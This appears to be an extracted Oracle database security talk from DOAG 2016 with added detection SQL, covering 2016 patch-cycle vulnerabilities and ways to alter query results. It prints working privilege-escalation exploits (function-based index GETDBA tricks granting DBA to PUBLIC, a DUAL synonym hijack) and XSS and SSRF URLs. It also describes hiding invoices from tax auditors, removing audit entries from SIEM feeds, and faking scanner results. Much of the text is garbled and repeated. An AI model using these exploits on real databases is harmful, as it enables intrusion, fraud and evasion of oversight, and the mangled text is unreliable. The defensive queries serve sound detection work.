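-- 2. Direct holders of the system privileges that make the trick possible:
--    CREATE ANY INDEX (Cloud Control demo), CREATE ANY PROCEDURE (WMSYS
--    variant on 12.1.0.2) and INHERIT ANY PRIVILEGES (the privilege whose
--    absence produced ORA-06598 on 12.1.0.2).
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE',
                     'INHERIT ANY PRIVILEGES')
 ORDER BY privilege, grantee;

-- 3. Function-based indexes on SYS/SYSTEM tables whose expression calls a
--    function owned by a different schema. COLUMN_EXPRESSION is a LONG, so
--    it is read in PL/SQL instead of being filtered with LIKE in SQL.
SET SERVEROUTPUT ON
DECLARE
  v_expr   VARCHAR2(32767);
  v_schema VARCHAR2(128);
BEGIN
  FOR r IN (SELECT i.owner, i.index_name, i.table_owner, i.table_name,
                   e.column_expression
              FROM dba_indexes i
              JOIN dba_ind_expressions e
                ON e.index_owner = i.owner
               AND e.index_name  = i.index_name
             WHERE i.index_type LIKE 'FUNCTION-BASED%'
               AND i.table_owner IN ('SYS', 'SYSTEM'))
  LOOP
    v_expr := UPPER(r.column_expression);
    -- schema part of the first dotted reference, e.g. "SYSTEM"."GETDBA"('AK')
    v_schema := REGEXP_SUBSTR(v_expr, '"?([A-Z0-9_$#]+)"?\.', 1, 1, NULL, 1);
    IF v_schema IS NOT NULL AND v_schema <> r.table_owner THEN
      DBMS_OUTPUT.PUT_LINE('Review FBI ' || r.owner || '.' || r.index_name ||
                           ' on ' || r.table_owner || '.' || r.table_name ||
                           ' -> ' || v_expr);
    END IF;
  END LOOP;
END;
/
```

The third query is the one that catches an index such as EXPLOIT_INDEX after the fact: a function-based index on a SYS or SYSTEM table whose expression points into a user schema has no legitimate reason to exist and should be dropped and investigated.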
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club just from the auditor? I will increase your salary..."
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, ...) via JDBC
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results
A lot of different wishes...
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate the SQL statement:
Select value ...
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user
Possible usage: replace true/false, replace USER/ADMIN, ...
the DBA can decide what will be returned
Select value ...
A typical query from security checklists / scanners looks like this: select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE
Oracle Data Redaction allows you to change the result value from FALSE to TRUE
==> Audit department is happy because the database passes all the security checks...
... from table/view ...
Modifying objects can be used as man in the middle as well
Possible approaches:
modify views (e.g. add spare=DBA1 to the view dba_audit_trail). All entries of the OS user DBA1 will be removed in the view; if a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved
create or change synonyms to "redirect" objects
replace a table with a view / instead-of trigger
--------- dbms_macadm ---------
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("Red Attack - The Catastrophe in the Database", Gunther Pipperr)
... where x=y
where conditions can be changed using VPD
VPD: add where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department
Select value from table/view where x=y
SQL Translation Framework (12c only) allows to replace an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
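An inventory script for the features the countermeasure list refers to, added here as an example and not taken from the deck: it lists Data Redaction policies, VPD policies, SQL Translation profiles and registered rewrites, the holders of the EXEMPT privileges, a DUAL synonym that no longer resolves to the SYS table, and a SHA-256 fingerprint of view DDL for the checksum idea. It assumes Oracle 12c (the REDACTION_* and DBA_SQL_TRANSLATION* views and DBMS_CRYPTO.HASH_SH256 are not available on 11g) and a SYSDBA session; VIEW_BASELINE and VIEW_FINGERPRINT are names chosen for this example.

```sql
-- Added example (not from the slides): where could a query be bent? Run as SYSDBA on 12c.

-- 1. Data Redaction policies: which objects are masked and for whom (EXPRESSION)
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY object_owner, object_name;

-- 2. VPD policies and the function that produces the extra WHERE clause
SELECT object_owner, object_name, policy_name, pf_owner, package, function, enable
  FROM dba_policies
 ORDER BY object_owner, object_name;

-- 3. SQL Translation Framework: profiles and registered Query A -> Query B rewrites
SELECT owner, profile_name, translator_schema, translator_package
  FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations;

-- 4. Who may bypass VPD / redaction (this list should be very short)
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY')
 ORDER BY privilege, grantee;

-- 5. Is DUAL still SYS.DUAL and still a table? Anything returned here is a
--    redirected synonym (the DVSYS trick above) and must be explained.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  JOIN dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC'
   AND s.synonym_name = 'DUAL'
   AND NOT (s.table_owner = 'SYS' AND o.object_type = 'TABLE');

-- 6. Checksums for views: fingerprint the DDL and compare with a stored baseline.
--    Keep the baseline table in a dedicated audit schema, not in SYS.
CREATE TABLE view_baseline (
  owner     VARCHAR2(128),
  view_name VARCHAR2(128),
  sha256    RAW(32),
  PRIMARY KEY (owner, view_name));

CREATE OR REPLACE FUNCTION view_fingerprint(p_owner VARCHAR2, p_view VARCHAR2)
  RETURN RAW IS
  v_ddl CLOB;
BEGIN
  -- DBMS_METADATA returns the full CREATE VIEW text, DBMS_CRYPTO hashes the CLOB
  v_ddl := DBMS_METADATA.GET_DDL('VIEW', p_view, p_owner);
  RETURN DBMS_CRYPTO.HASH(v_ddl, DBMS_CRYPTO.HASH_SH256);
END;
/

-- record the baseline once, e.g. for the audit view the SIEM reads
INSERT INTO view_baseline
VALUES ('SYS', 'DBA_AUDIT_TRAIL', view_fingerprint('SYS', 'DBA_AUDIT_TRAIL'));
COMMIT;

-- later (scheduled): report every view whose definition no longer matches
SELECT b.owner, b.view_name
  FROM view_baseline b
 WHERE b.sha256 <> view_fingerprint(b.owner, b.view_name);
```

Queries 1 to 4 are worth running even on databases where none of these features are officially in use, which is exactly the point of the last bullet on the slide: an empty result is the expected state, and any row is a finding.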
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors / Security Department should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
